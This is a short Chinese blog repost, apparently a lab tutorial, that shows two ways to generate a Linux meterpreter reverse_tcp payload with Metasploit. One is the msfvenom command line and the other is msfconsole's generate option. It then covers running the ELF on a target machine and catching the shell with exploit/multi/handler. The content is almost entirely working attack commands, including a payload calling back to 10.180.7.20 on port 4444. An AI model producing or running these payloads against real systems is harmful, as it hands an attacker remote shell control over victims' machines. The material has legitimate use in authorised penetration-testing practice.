首页 > 系统服务 > 详细

Linux下反弹meterpreter及生成payload的两种方式

时间:2019-11-12 14:24:00      阅读:247      评论:0      收藏:0      [点我收藏+]

1、CLI下生成payload

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.180.7.20 lport=4444 -f elf -o shell.elf

技术分享图片

 

 

 

2、msfconsole下生成payload

use payload/linux/x86/meterpreter/reverse_tcp    并设置option

技术分享图片

 

 

generate -h  有丰富的选项

技术分享图片

 

 

generate -f elf -o /shell.elf   根据需要添加选项   -o输出文件到指定目录

技术分享图片

 

 

 

3、在靶机上执行该文件,并在msf下监听

在靶机上给文件赋值,并执行该文件

技术分享图片

 

 

在msf监听端口

msf  >  use exploit/multi/handler
msf  >  set payload linux/x86/meterpreter/reverse_tcp
msf  >  set LHOST 10.180.7.20
msf  >  run

Linux下反弹meterpreter及生成payload的两种方式

原文:https://www.cnblogs.com/lw-monster/p/11841415.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!